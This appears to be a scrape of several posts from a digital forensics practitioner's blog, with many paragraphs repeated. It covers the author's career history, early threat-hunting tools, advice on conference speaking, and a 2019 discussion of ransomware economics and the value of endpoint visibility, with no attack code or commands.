At one point early in my career, I worked for a company that was trying to get into the security business, and while I was waiting for a contract, I taught myself Perl because that's a skill that the network engineering folks were looking for in candidates at the time, and I wanted to help out. I never did get a chance to do any really extensive work for them, and I later moved on to a different company, this time performing more extensive (than just war dialing) vulnerability assessments. My boss at the time told me that I would need to run the commercial scanner (ISS's Internet Scanner) for "about 2 to 3 yrs" before I would really understand what it was doing; within 6 months of getting the job, I was writing a tool to replace the commercial product, due to the number of false "hits" we were getting, many due to misinterpretation of the data returned from the query.
For example, there was the AutoAdminLogon value in the Registry; if the commercial tool found the value name, it responded with "AutoAdminLogon value set", even if the data for the value was "0". Further, it never checked for the DefaultUserName or DefaultPassword values. In one instance, the commercial tool determined that 22 systems within a customer's infrastructure had the value 'set', while the customer knew that it was only 1 system for which the value was actually set, and the system would automatically log into the Administrator account upon system boot; the other 21 had the value name, but the data was "0", and there was no username or password in the Registry. They had already found those 21 systems and disabled the functionality through the UI; had we provided the findings from the commercial tool in our report, we would have been remiss, and the customer would have been correct in questioning the rest of the report.
Looking back, I realize that what I'd written was a "threat hunting" tool. We didn't have any software at the time that could perform EDR functions; "visibility" consisted of either sitting at the console and opening Task Manager, or having the admin send a screen capture of Task Manager. However, this tool was accessing systems and getting all sorts of data from it, including things like active modems, running services, applications, etc. So while the tool wasn't able to monitor processes and network connections over time, it was able get point-in-time data, as well as look at what had occurred in the past on the system. This was the '98-'99 time frame, and as such, a bit before terms like "adversary" and "APT" started to appear in our everyday usage.
I haven't always been in a consulting role. At one point in my career, I took a position as a computer security engineer in an FTE role. During that time, I responded to a couple of internal incidents, and wrote another "threat hunting" tool, albeit on a very limited scale. The tool would access the Windows domain and get a list of all currently running systems; from there, it would access each system and collect the contents of several persistence locations. When I first ran the tool, I'd get a LOT of data back, but over time and with no small amount of investigation, I developed a whitelist of authorized entries. So, after a couple of weeks, I could launch the tool when I headed to a meeting or to lunch, and come back to a list of entries about half a page long. This allowed me to see some issues, sometimes before they became really big issues, as well as identify trends across the infrastructure. For example, there was one system that, because of it's location and the fact that it was used by overnight staff, kept popping up with "issues", no matter how many times I cleaned it.
Right around the '99-'00 time frame, I started attending and, more importantly, speaking at security conferences, including BlackHat and DefCon. I had a great deal of experience with public speaking (I had been an instructor while I was on active duty, and classroom audiences were generally 250+ students...) but I was still a little nervous about presenting, because I had this image in my mind of what the audience was going to be like; today, we call this "imposter syndrome". When I was an instructor in the military, I was a more experienced officer (albeit not by much...just a few years), speaking on my profession (i.e., communications). I was teaching new officers the basic skills they needed to learn, using the equipment I was very familiar with. It was an entirely different environment, and here I was speaking to a roomful of people who, I figured, had a great deal more experience in the industry than I did. And in some cases, that was a correct assumption, albeit not in all cases. What I found when presenting on a solution I'd found to a problem I had was that there were others who had a similar problem, but had not yet arrived at a solution. This realization really changed things for me, it really impacted my perspective, and it subsequently led to me submitting more and more.
For all of you out there who are thinking about submitting a presentation, and that thought scares you to death, ask yourself why that is. More than likely, it's because you're thinking that you'll be judged. And you're right, that's what people do. However, the next time you're attending a speaking event, sit in the back of the room and just watch what everyone else is doing. There will be lots of things they're doing...but one of them won't be paying attention, not for many folks, anyway. Case in point, just a little over a month and a half ago, I gave a presentation, and at the beginning of the presentation, I stated...twice...when copies of the slides would be available. The first question at the end of the presentation was...well, get three guesses, and the first two don't count.
My point is that a great deal of the anxiety that you feel when thinking about submitting to or just speaking at a conference is pretty normal, but it's also largely self-inflicted. Don't let it paralyze you; instead, use it to fuel your development. Use that energy to check the details of your presentation one more time, to rehearse one more time, to seek out feedback on the content one more time.
And don't be afraid of people asking questions, because that fear will prevent you from actually listening to the question. Remember, for all intents and purposes, you are the expert on the topic, and you're presenting your view, based on your perspective. Yes, there are going to be other perspectives; don't be so overwhelmed by the fear of a question that you don't actually listen to the question. I've been asked, "...did you look at...", as well as the more pointed, "...why didn't you consider...", and by listening to the question, I was able to get beyond that "imposter syndrome" anxiety and actually address the question.
One question I received back in the early 2000's was at an HTCIA International conference in Fairfax, VA...I was presenting on Registry analysis and someone in the audience, with a laptop in front of them, asked me, "what happens when you do X?" I had a sudden flash of inspiration, and I turned the question around...I asked the person asking the question to try what he'd suggested, and tell us all what he found. No, what he'd asked wasn't something I'd considered, but it did seem like a good idea...so rather than going back and forth on the specifics, I thought it would be a great idea to have them try it, in hopes of getting others to see that rather than going to someone else for answers, there are a great number of things we can try on our own, and discover for ourselves.
In 2005, Cory Altheide and I wrote the first published paper on tracking USB devices across Windows systems. It's fascinating to look back and see not only how far we've come with this topic, particularly given how much the Windows operating system has changed over that time, but to also see how many times the paper is referenced. In most cases, the articles that reference our work are peer-reviewed articles, ones for which a literature search is a requirement. Even so, it's pretty cool to see how many times that article is referenced. Yes, there are a lot of those in the industry (as with any other industry) who "do" research without first performing a literature search, but that search is a pretty hard-and-fast requirement for academic, peer-reviewed papers, and it is pretty fascinating to see the number of references to our paper.
As digital forensics and incident response grew into something around which a service could be built and sold to customers, we started to develop "go kits", and there were lots of discussions and arguments on the Internet regarding what went into those kits. Prior to the advent of enterprise-wide response capabilities (i.e., deploying an EDR monitoring tool, etc.), I had a Pelican case that weighed 65 lbs (I know because I had to check it in every time I flew out...), and contained two MacBook laptops, running Windows XP, two sets of hardware write-blockers, a wide assortment of cables, as well as hard copies of documentation. I also had a laptop in my backpack with backup copies of all documentation, as well as hard copy of all pertinent phone numbers; if EVERYTHING failed, including my cell phone (notice I didn't say "smart phone", because we didn't have those at the time) battery, I still needed to be able to contact my boss, the customer, etc. If I lost everything else, I could still get to a store, purchase a new laptop, put the tools I used on it (from a CD...remember those?), and get to work.
With the enterprise reach of EDR tools that we have at our disposal, there's a shift in how the DFIR industry reacts and provides services, but we still have a lot our original or age-old issues, due to the fact that as the industry has progressed, we've never really dealt with those issues. Things like documentation and sharing of information or threat intel, specificity of language, correct data interpretation, not interpreting artifacts in isolation from other artifacts, etc. These are things that we need to improve upon, as an industry.
Even so, it's been pretty fascinating to me to see how, in some cases, DFIR work has really progressed, particularly with respect to enterprise-wide response. There's quick/timely deployment of visibility (i.e., EDR) from a remote location, data is collected and analyzed, and then answers are provided, very often before the next available flight to the location departs. It's a brave new world out there regarding what can be done to respond to incidents.
Once I left active duty, one of my first jobs was in an information security role, and I was doing a fair bit of "war dialing", which was fun. The main programs we used at the time were THC Scan and Tone Loc, but in a pinch, you could use the Windows dialer to connect to a number, and listen to the laptop speaker to determine what was on the other end. In most instances, you'd get someone saying, "hello?", but in the few instances where a computer or fax would pick up, we'd note that and move on. The laptops available at the time had built-in modems, as well as PCMCIA slots if you wanted to insert a network (ethernet or, yes, token ring) card. Our laptop bags had phone and ethernet cables, but most companies wouldn't spring for a token ring card because (a) they were expensive and (b) not many customers had token ring networks. Until you went on-site and someone said, "uh...oh, yeah...we use token ring." Of course, no one would say anything during the initial call unless you specifically asked, so that question went on script.
At that time, "computer forensics" was really not well known outside of very small circles, so there weren't much in the way of "go bags" or kits. The few folks "doing" computer forensics at the time (that I was aware of) were largely former AF OSI enlisted folks, sequestered behind heavy duty doors with special locks. When you did get a peek inside their wizardy world, the biggest component was a custom-built tower system with extra bays, and everything running on Linux.
At one point early in my career, I worked for a company that was trying to get into the security business, and while I was waiting for a contract, I taught myself Perl because that's a skill that the network engineering folks were looking for in candidates at the time, and I wanted to help out. I never did get a chance to do any really extensive work for them, and I later moved on to a different company, this time performing more extensive (than just war dialing) vulnerability assessments. My boss at the time told me that I would need to run the commercial scanner (ISS's Internet Scanner) for "about 2 to 3 yrs" before I would really understand what it was doing; within 6 months of getting the job, I was writing a tool to replace the commercial product, due to the number of false "hits" we were getting, many due to misinterpretation of the data returned from the query.
For example, there was the AutoAdminLogon value in the Registry; if the commercial tool found the value name, it responded with "AutoAdminLogon value set", even if the data for the value was "0". Further, it never checked for the DefaultUserName or DefaultPassword values. In one instance, the commercial tool determined that 22 systems within a customer's infrastructure had the value 'set', while the customer knew that it was only 1 system for which the value was actually set, and the system would automatically log into the Administrator account upon system boot; the other 21 had the value name, but the data was "0", and there was no username or password in the Registry. They had already found those 21 systems and disabled the functionality through the UI; had we provided the findings from the commercial tool in our report, we would have been remiss, and the customer would have been correct in questioning the rest of the report.
Looking back, I realize that what I'd written was a "threat hunting" tool. We didn't have any software at the time that could perform EDR functions; "visibility" consisted of either sitting at the console and opening Task Manager, or having the admin send a screen capture of Task Manager. However, this tool was accessing systems and getting all sorts of data from it, including things like active modems, running services, applications, etc. So while the tool wasn't able to monitor processes and network connections over time, it was able get point-in-time data, as well as look at what had occurred in the past on the system. This was the '98-'99 time frame, and as such, a bit before terms like "adversary" and "APT" started to appear in our everyday usage.
I haven't always been in a consulting role. At one point in my career, I took a position as a computer security engineer in an FTE role. During that time, I responded to a couple of internal incidents, and wrote another "threat hunting" tool, albeit on a very limited scale. The tool would access the Windows domain and get a list of all currently running systems; from there, it would access each system and collect the contents of several persistence locations. When I first ran the tool, I'd get a LOT of data back, but over time and with no small amount of investigation, I developed a whitelist of authorized entries. So, after a couple of weeks, I could launch the tool when I headed to a meeting or to lunch, and come back to a list of entries about half a page long. This allowed me to see some issues, sometimes before they became really big issues, as well as identify trends across the infrastructure. For example, there was one system that, because of it's location and the fact that it was used by overnight staff, kept popping up with "issues", no matter how many times I cleaned it.
Right around the '99-'00 time frame, I started attending and, more importantly, speaking at security conferences, including BlackHat and DefCon. I had a great deal of experience with public speaking (I had been an instructor while I was on active duty, and classroom audiences were generally 250+ students...) but I was still a little nervous about presenting, because I had this image in my mind of what the audience was going to be like; today, we call this "imposter syndrome". When I was an instructor in the military, I was a more experienced officer (albeit not by much...just a few years), speaking on my profession (i.e., communications). I was teaching new officers the basic skills they needed to learn, using the equipment I was very familiar with. It was an entirely different environment, and here I was speaking to a roomful of people who, I figured, had a great deal more experience in the industry than I did. And in some cases, that was a correct assumption, albeit not in all cases. What I found when presenting on a solution I'd found to a problem I had was that there were others who had a similar problem, but had not yet arrived at a solution. This realization really changed things for me, it really impacted my perspective, and it subsequently led to me submitting more and more.
For all of you out there who are thinking about submitting a presentation, and that thought scares you to death, ask yourself why that is. More than likely, it's because you're thinking that you'll be judged. And you're right, that's what people do. However, the next time you're attending a speaking event, sit in the back of the room and just watch what everyone else is doing. There will be lots of things they're doing...but one of them won't be paying attention, not for many folks, anyway. Case in point, just a little over a month and a half ago, I gave a presentation, and at the beginning of the presentation, I stated...twice...when copies of the slides would be available. The first question at the end of the presentation was...well, get three guesses, and the first two don't count.
My point is that a great deal of the anxiety that you feel when thinking about submitting to or just speaking at a conference is pretty normal, but it's also largely self-inflicted. Don't let it paralyze you; instead, use it to fuel your development. Use that energy to check the details of your presentation one more time, to rehearse one more time, to seek out feedback on the content one more time.
And don't be afraid of people asking questions, because that fear will prevent you from actually listening to the question. Remember, for all intents and purposes, you are the expert on the topic, and you're presenting your view, based on your perspective. Yes, there are going to be other perspectives; don't be so overwhelmed by the fear of a question that you don't actually listen to the question. I've been asked, "...did you look at...", as well as the more pointed, "...why didn't you consider...", and by listening to the question, I was able to get beyond that "imposter syndrome" anxiety and actually address the question.
One question I received back in the early 2000's was at an HTCIA International conference in Fairfax, VA...I was presenting on Registry analysis and someone in the audience, with a laptop in front of them, asked me, "what happens when you do X?" I had a sudden flash of inspiration, and I turned the question around...I asked the person asking the question to try what he'd suggested, and tell us all what he found. No, what he'd asked wasn't something I'd considered, but it did seem like a good idea...so rather than going back and forth on the specifics, I thought it would be a great idea to have them try it, in hopes of getting others to see that rather than going to someone else for answers, there are a great number of things we can try on our own, and discover for ourselves.
In 2005, Cory Altheide and I wrote the first published paper on tracking USB devices across Windows systems. It's fascinating to look back and see not only how far we've come with this topic, particularly given how much the Windows operating system has changed over that time, but to also see how many times the paper is referenced. In most cases, the articles that reference our work are peer-reviewed articles, ones for which a literature search is a requirement. Even so, it's pretty cool to see how many times that article is referenced. Yes, there are a lot of those in the industry (as with any other industry) who "do" research without first performing a literature search, but that search is a pretty hard-and-fast requirement for academic, peer-reviewed papers, and it is pretty fascinating to see the number of references to our paper.
As digital forensics and incident response grew into something around which a service could be built and sold to customers, we started to develop "go kits", and there were lots of discussions and arguments on the Internet regarding what went into those kits. Prior to the advent of enterprise-wide response capabilities (i.e., deploying an EDR monitoring tool, etc.), I had a Pelican case that weighed 65 lbs (I know because I had to check it in every time I flew out...), and contained two MacBook laptops, running Windows XP, two sets of hardware write-blockers, a wide assortment of cables, as well as hard copies of documentation. I also had a laptop in my backpack with backup copies of all documentation, as well as hard copy of all pertinent phone numbers; if EVERYTHING failed, including my cell phone (notice I didn't say "smart phone", because we didn't have those at the time) battery, I still needed to be able to contact my boss, the customer, etc. If I lost everything else, I could still get to a store, purchase a new laptop, put the tools I used on it (from a CD...remember those?), and get to work.
With the enterprise reach of EDR tools that we have at our disposal, there's a shift in how the DFIR industry reacts and provides services, but we still have a lot our original or age-old issues, due to the fact that as the industry has progressed, we've never really dealt with those issues. Things like documentation and sharing of information or threat intel, specificity of language, correct data interpretation, not interpreting artifacts in isolation from other artifacts, etc. These are things that we need to improve upon, as an industry.
Even so, it's been pretty fascinating to me to see how, in some cases, DFIR work has really progressed, particularly with respect to enterprise-wide response. There's quick/timely deployment of visibility (i.e., EDR) from a remote location, data is collected and analyzed, and then answers are provided, very often before the next available flight to the location departs. It's a brave new world out there regarding what can be done to respond to incidents.
Monday, September 09, 2019
The Ransomware Economy
There's no doubt about it...cybercrime, and especially ransomware, is an entire economy in and of itself.
Don't believe me?
Read through this ProPublica article, not just once, but a couple of times. And take notes. Then go back and read the notes. Here's what I got from the article:
Not long ago, a fellow responder shared that many of the ransomware cases he works include an element of data exfiltration. A recent 60Minutes segment on ransomware includes a similar statement; if you watch until 9:50 in the segment, you'll see mention of the bad guy further extorting an organization by threatening to leak their "internal data".
Let's look at some of the reporting on ransomware, such as this The Conversation article. At one point in the article, we see the statement:
Ransomware usually spreads via phishing emails or links...
Perhaps "usually", yes, but not always. The 60Minutes segment mentioned the Samsam ransomware; during the first half of 2016, these guys were seen using the publicly available JexBoss exploit to gain access to organizations through JBoss CMS servers. At that time, the average time between initial access to the organization and deploying the ransomware was 4 months. In 2017, in some cases, they switched to Terminal Services servers, gaining access via easily-guessed passwords. Yes, some ransomware (some Ryuk incidents, for example) incidents begin with a phishing email, and then branch off into deploying remote access tools, internal reconnaissance, possibly privilege escalation, networking mapping, and finally, deploying the ransomware.
Another quote from the article:
Offenders will do their homework before launching an attack, in order to create the most severe disruption they possibly can.
Yes, they will. But what does this mean? This means a couple of things; first, they decide who to target, and when. Employees within companies have targets against which they're judged; sales reps, for example, usually hit crunch time at the end of a quarter. So, what the bad guys will do is send something to a sales rep that looks legit, and it's something that they need to open. Yes, they're targeting individuals.
What does this look like, you ask? While not related to ransomware, but take a look at the Mia Ash story, and you'll see what targeting looks like. Going after sales reps, or the finance department, legal counsel...all of these are targets within an organization, and very often the "lure" looks attractive enough to obviate phishing awareness training. However, this is only the beginning. In the Mia Ash story, the adversary developed a relationship with their targets, to the point where, when it came time to send a weaponized document for the target to open, the target had no doubt in their mind regarding the fact that they were dealing with "Mia".
Something that isn't stated in the media is that, for some ransomware cases, once an adversary gains initial access to an infrastructure, there are a number of actions that must take place in order for them to have such an impact as to make paying the ransom the obvious choice going forward. They need to observe and orient to where they are, collect information about the infrastructure, make decisions (that's the easy part, they're often quite practiced at this), and then act. This is Col Boyd's OODA loop. In some cases, this can take weeks, and in others, months. Unfortunately, one of the things missing from public reporting of ransomware incidents, in addition to the observed initial access method, is the time that the adversary is on target before deploying ransomware. It's not an easy task to go into a completely new infrastructure and find those files and systems that, if unavailable, would bring the organization to a halt.
With visibility, these actions can be detected, and responded to in a timely manner. When I say, "responded to", I mean determining the initial infection vector and following a containment and eradication plan early in the adversary's process. Let's say that you detect a new account being created on a system, because you have the visibility to do so...which user account was used to create the new one? How did that user account gain access to the system on which the command was run? Follow the tracks back to the starting point, and determine how the adversary got on the system, and then search your infrastructure for other, similar artifacts.
It all starts with visibility. Don't address ransomware by trying to figure out if you should restore systems from backup or pay the ransom; instead, catch the adversary early in their process and stop them before they encrypt their first file.
Don't believe me?
Read through this ProPublica article, not just once, but a couple of times. And take notes. Then go back and read the notes. Here's what I got from the article:
- Organizations are looking to insurance policies to defray the costs of incidents. Rather than investing in prevention, detection, and response, they're accepting (to some degree) that these incidents are going to happen, and seeking to establish a means to minimize their financial risk. Hence, insurance policies.
- A ransomware incident occurs, and the policy kicks in. Depending upon how the policy was set up, and what it covers, the deductible may be much less than the ransom. Financial risk minimized.
- Insurance providers are more interested in getting ransoms paid quickly; getting the encryption keys and recovering files minimizes down time, and therefore any additional costs incurred as a result of services not being available. So, insurance providers want the ransom paid, in order to minimize their financial exposure.
- There's also an entire economy that's popped up around ransom payment brokers, organizations that act as intermediaries between victim organizations, insurance providers, and the bad guys.
Not long ago, a fellow responder shared that many of the ransomware cases he works include an element of data exfiltration. A recent 60Minutes segment on ransomware includes a similar statement; if you watch until 9:50 in the segment, you'll see mention of the bad guy further extorting an organization by threatening to leak their "internal data".
Let's look at some of the reporting on ransomware, such as this The Conversation article. At one point in the article, we see the statement:
Ransomware usually spreads via phishing emails or links...
Perhaps "usually", yes, but not always. The 60Minutes segment mentioned the Samsam ransomware; during the first half of 2016, these guys were seen using the publicly available JexBoss exploit to gain access to organizations through JBoss CMS servers. At that time, the average time between initial access to the organization and deploying the ransomware was 4 months. In 2017, in some cases, they switched to Terminal Services servers, gaining access via easily-guessed passwords. Yes, some ransomware (some Ryuk incidents, for example) incidents begin with a phishing email, and then branch off into deploying remote access tools, internal reconnaissance, possibly privilege escalation, networking mapping, and finally, deploying the ransomware.
Another quote from the article:
Offenders will do their homework before launching an attack, in order to create the most severe disruption they possibly can.
Yes, they will. But what does this mean? This means a couple of things; first, they decide who to target, and when. Employees within companies have targets against which they're judged; sales reps, for example, usually hit crunch time at the end of a quarter. So, what the bad guys will do is send something to a sales rep that looks legit, and it's something that they need to open. Yes, they're targeting individuals.
What does this look like, you ask? While not related to ransomware, but take a look at the Mia Ash story, and you'll see what targeting looks like. Going after sales reps, or the finance department, legal counsel...all of these are targets within an organization, and very often the "lure" looks attractive enough to obviate phishing awareness training. However, this is only the beginning. In the Mia Ash story, the adversary developed a relationship with their targets, to the point where, when it came time to send a weaponized document for the target to open, the target had no doubt in their mind regarding the fact that they were dealing with "Mia".
Something that isn't stated in the media is that, for some ransomware cases, once an adversary gains initial access to an infrastructure, there are a number of actions that must take place in order for them to have such an impact as to make paying the ransom the obvious choice going forward. They need to observe and orient to where they are, collect information about the infrastructure, make decisions (that's the easy part, they're often quite practiced at this), and then act. This is Col Boyd's OODA loop. In some cases, this can take weeks, and in others, months. Unfortunately, one of the things missing from public reporting of ransomware incidents, in addition to the observed initial access method, is the time that the adversary is on target before deploying ransomware. It's not an easy task to go into a completely new infrastructure and find those files and systems that, if unavailable, would bring the organization to a halt.
With visibility, these actions can be detected, and responded to in a timely manner. When I say, "responded to", I mean determining the initial infection vector and following a containment and eradication plan early in the adversary's process. Let's say that you detect a new account being created on a system, because you have the visibility to do so...which user account was used to create the new one? How did that user account gain access to the system on which the command was run? Follow the tracks back to the starting point, and determine how the adversary got on the system, and then search your infrastructure for other, similar artifacts.
It all starts with visibility. Don't address ransomware by trying to figure out if you should restore systems from backup or pay the ransom; instead, catch the adversary early in their process and stop them before they encrypt their first file.
A Brief History of DFIR Time, pt I
Whether we like it or not, we're all time travelers. We're all moving through time, caught in the flow. In the western world, we're moving left-to-right, going along with the flow of time, from point A to point B.
Sometimes it's interesting to look back at where we've been, what we've been witness to, and to reflect on and appreciate it. Here's an abridged version of my take...
As a kid, my parents purchased a Timex-Sinclair 1000 computer. I started out by following instructions for writing programs and saving them to a cassette tape...or trying to, as the case may be. This wasn't the most reliable means (although it was the only one) for saving programs, and sometimes things would get corrupted, and I'd have to start all over. As I learned a little bit of coding, I'd try different things...I'd start with the basic (no pun intended) recipe, and then make small modifications to see what happened.
In the early '80s, I was programming BASIC on the Apple IIe during a summer course. Later, my parents purchased an Epson QX-10, which my father used for word processing. During my senior year in high school, I took AP Computer Science, which involved programming PASCAL on the TRS-80 systems at the school. My folks found a copy of Turbo PASCAL, which meant I could easily compile my programs at home in minutes, rather than trying to schedule time to get access to one of the TRS-80 systems at school, and get in before lunch, because compilation took over half an hour for some programs.
When I went to college (circa '85) we had a BASIC programming course, and we were still using the TRS-80 systems. There were some mainframe systems in the physics building, and while I didn't get a real introduction to networking, some of did have fun sending messages to each other using the "wall" command.
After I got commissioned and went on active duty, I really didn't have a great deal of contact with computers. In the Marine Corps at that time, Communications was a separate MOS from Data Processing, and as such, officers (and enlisted) for the MOSs attended separate schools. For officers, both school houses were located on Quantico, at the time. After training, I found that there was a great deal of cross-training in the fleet; quite often, CommOs were sent to data processing courses by their units. The Marine Corps later combined the MOSs, along with the school houses and the curricula.
In the mid-'90s, I had the opportunity to attend graduate school, and I really got much more involved with computers. I showed up with a 486DX desktop system that I used at home, and one of the first things I did was add a hard drive. At the time, that meant putting it in the right location on the ribbon cable, and setting the correct jumpers on the drive chassis. I later saved up and purchased additional RAM, going from 4MB to 16MB. Yes, with an "M". I also began going beyond Windows for Workgroups 3.11, and expanding into OS/2 2.1, and then later, OS/2 3.0 Warp. At the time, I was using a SLIP/PPP script to dial into a local ISP, and then connecting remotely to the school systems.
Interestingly enough, I found someone in my local community who was running a BBS based on Amiga systems, and got a look at his setup. That was a big deal at the time, because the town I lived in was close to a LATA border, meaning that while I could dial a number that was physically located about 10 miles south of me for no extra charge, the closest AOL POP was two miles north, and therefore, a long distance charge. Eventually an airline pilot who lived in the local community set up an ISP, and I used that to access the Internet.
At school, I was working on SparcStations, using the Netscape browser. I was learning about UseNet, SunOS, *nix-based systems, etc., none of which had anything to do with the curriculum. I was the student rep to the sysadmin council when SATAN was released. During the course of my "studies", I learned a little bit of C and C++ coding, a lot of MatLab, and a good bit of Java, at a time before Java was 1.0 GA status. I played around with a bunch of different things with Java...I wrote programs to query fingerd, wrote an email spoofing program, and I wrote some code that connected the chargen port to the echo port...that was fun!
When I first started at graduate school, I didn't know it at the time, but I spent about 4 months walking by Gary Kildall's office every day on my way out of the building. His office was next to one of the main doors that led out to the quad, where I'd go sit to each lunch. I never met Gary, nor took one of his courses, and again, it wasn't until much later that I found out who he was, and the role he played (or depending on your perspective, didn't play...) in the history of computing. In one of my courses, I learned about the Hamming distance, and later took a seminar from Dr. Hamming himself.
As part of my master's thesis, I set up a lab; it consisted of two Cisco 2514 routers that I cross-connected, and from which I ran two small networks. One was 10BaseT, the other 10Base2, and both had one Windows NT 3.51 server and three Windows 95 workstations. The entire set up was connected to the campus backbone via a 10Base5 "vampire tap". To collect data for my thesis, I wrote an SNMP polling application in Java, and processed the data using various statistical techniques in MatLab.
While I was in graduate school, one of my favorite courses was a new class in neural networks. Part of the reason I liked it was due to how it was structured; the first half of the course was some instruction and small projects to get out feet wet, but the projects were small enough to allow us to stretch a bit, as well. In many of the courses available at the time, the labs were such that it took most, if not all of the week to get them done, so there was very little learning beyond just finishing the minimum requirements for the lab. In this course (and a few others), a different approach was taken, one that allowed the students to engage, experiment, and learn. The second half of the course was a project, which was really cool to work on. As it turned out, several of the students used that course as the basis for their master's thesis...one wrote a program that could discern 'dirty' images of six consecutive Cyrillic characters (i.e., something you'd seen in a satellite photo of Red Square, for example.) Another student created a neural network to assist with sonar identification.
So, how does all this matter? Well, 24+ years later, I can discern what's behind the terms "ML" and "AI" that we see with respect to cyber security products. ;-)
My time in grad school was also when I started brushing up against "information security" in the world of computers. During a C programming course, I finished my assigned labs and wanted to learn a bit more, so I downloaded a file called 'crack.c' to see what it did. All I ever did was open it in an editor, but the senior sysadmin for the department got upset. She even told me that I had "violated security policies". When I asked her to see the policies, knowing that I had never signed such a policy, I learned that there really was no written "policy". That was to change more than a year later when a new Admiral took over the school, but at the time, there was no written security policy that any students read or signed.
After I graduated, I spent 8 months processing out of the military, and during that time was assigned to the Marine detachment at the Defense Language Institute (DLI). While there, one of the things I did was get the detachment's computer systems connected to the DLI campus area network (CAN), which was token ring. Also during that time, the Commandant of the Marine Corps (Gen. Krulak) had stated that Marines were authorized to play "Marine DOOM"; the setup at the detachment was six Gateway systems connected via 10Base2, running IPX. I was able to use what I had learned just down the street (literally) to help get the "network" up and running.
Sometimes it's interesting to look back at where we've been, what we've been witness to, and to reflect on and appreciate it. Here's an abridged version of my take...
As a kid, my parents purchased a Timex-Sinclair 1000 computer. I started out by following instructions for writing programs and saving them to a cassette tape...or trying to, as the case may be. This wasn't the most reliable means (although it was the only one) for saving programs, and sometimes things would get corrupted, and I'd have to start all over. As I learned a little bit of coding, I'd try different things...I'd start with the basic (no pun intended) recipe, and then make small modifications to see what happened.
In the early '80s, I was programming BASIC on the Apple IIe during a summer course. Later, my parents purchased an Epson QX-10, which my father used for word processing. During my senior year in high school, I took AP Computer Science, which involved programming PASCAL on the TRS-80 systems at the school. My folks found a copy of Turbo PASCAL, which meant I could easily compile my programs at home in minutes, rather than trying to schedule time to get access to one of the TRS-80 systems at school, and get in before lunch, because compilation took over half an hour for some programs.
When I went to college (circa '85) we had a BASIC programming course, and we were still using the TRS-80 systems. There were some mainframe systems in the physics building, and while I didn't get a real introduction to networking, some of did have fun sending messages to each other using the "wall" command.
After I got commissioned and went on active duty, I really didn't have a great deal of contact with computers. In the Marine Corps at that time, Communications was a separate MOS from Data Processing, and as such, officers (and enlisted) for the MOSs attended separate schools. For officers, both school houses were located on Quantico, at the time. After training, I found that there was a great deal of cross-training in the fleet; quite often, CommOs were sent to data processing courses by their units. The Marine Corps later combined the MOSs, along with the school houses and the curricula.
In the mid-'90s, I had the opportunity to attend graduate school, and I really got much more involved with computers. I showed up with a 486DX desktop system that I used at home, and one of the first things I did was add a hard drive. At the time, that meant putting it in the right location on the ribbon cable, and setting the correct jumpers on the drive chassis. I later saved up and purchased additional RAM, going from 4MB to 16MB. Yes, with an "M". I also began going beyond Windows for Workgroups 3.11, and expanding into OS/2 2.1, and then later, OS/2 3.0 Warp. At the time, I was using a SLIP/PPP script to dial into a local ISP, and then connecting remotely to the school systems.
Interestingly enough, I found someone in my local community who was running a BBS based on Amiga systems, and got a look at his setup. That was a big deal at the time, because the town I lived in was close to a LATA border, meaning that while I could dial a number that was physically located about 10 miles south of me for no extra charge, the closest AOL POP was two miles north, and therefore, a long distance charge. Eventually an airline pilot who lived in the local community set up an ISP, and I used that to access the Internet.
At school, I was working on SparcStations, using the Netscape browser. I was learning about UseNet, SunOS, *nix-based systems, etc., none of which had anything to do with the curriculum. I was the student rep to the sysadmin council when SATAN was released. During the course of my "studies", I learned a little bit of C and C++ coding, a lot of MatLab, and a good bit of Java, at a time before Java was 1.0 GA status. I played around with a bunch of different things with Java...I wrote programs to query fingerd, wrote an email spoofing program, and I wrote some code that connected the chargen port to the echo port...that was fun!
When I first started at graduate school, I didn't know it at the time, but I spent about 4 months walking by Gary Kildall's office every day on my way out of the building. His office was next to one of the main doors that led out to the quad, where I'd go sit to each lunch. I never met Gary, nor took one of his courses, and again, it wasn't until much later that I found out who he was, and the role he played (or depending on your perspective, didn't play...) in the history of computing. In one of my courses, I learned about the Hamming distance, and later took a seminar from Dr. Hamming himself.
As part of my master's thesis, I set up a lab; it consisted of two Cisco 2514 routers that I cross-connected, and from which I ran two small networks. One was 10BaseT, the other 10Base2, and both had one Windows NT 3.51 server and three Windows 95 workstations. The entire set up was connected to the campus backbone via a 10Base5 "vampire tap". To collect data for my thesis, I wrote an SNMP polling application in Java, and processed the data using various statistical techniques in MatLab.
While I was in graduate school, one of my favorite courses was a new class in neural networks. Part of the reason I liked it was due to how it was structured; the first half of the course was some instruction and small projects to get out feet wet, but the projects were small enough to allow us to stretch a bit, as well. In many of the courses available at the time, the labs were such that it took most, if not all of the week to get them done, so there was very little learning beyond just finishing the minimum requirements for the lab. In this course (and a few others), a different approach was taken, one that allowed the students to engage, experiment, and learn. The second half of the course was a project, which was really cool to work on. As it turned out, several of the students used that course as the basis for their master's thesis...one wrote a program that could discern 'dirty' images of six consecutive Cyrillic characters (i.e., something you'd seen in a satellite photo of Red Square, for example.) Another student created a neural network to assist with sonar identification.
So, how does all this matter? Well, 24+ years later, I can discern what's behind the terms "ML" and "AI" that we see with respect to cyber security products. ;-)
My time in grad school was also when I started brushing up against "information security" in the world of computers. During a C programming course, I finished my assigned labs and wanted to learn a bit more, so I downloaded a file called 'crack.c' to see what it did. All I ever did was open it in an editor, but the senior sysadmin for the department got upset. She even told me that I had "violated security policies". When I asked her to see the policies, knowing that I had never signed such a policy, I learned that there really was no written "policy". That was to change more than a year later when a new Admiral took over the school, but at the time, there was no written security policy that any students read or signed.
After I graduated, I spent 8 months processing out of the military, and during that time was assigned to the Marine detachment at the Defense Language Institute (DLI). While there, one of the things I did was get the detachment's computer systems connected to the DLI campus area network (CAN), which was token ring. Also during that time, the Commandant of the Marine Corps (Gen. Krulak) had stated that Marines were authorized to play "Marine DOOM"; the setup at the detachment was six Gateway systems connected via 10Base2, running IPX. I was able to use what I had learned just down the street (literally) to help get the "network" up and running.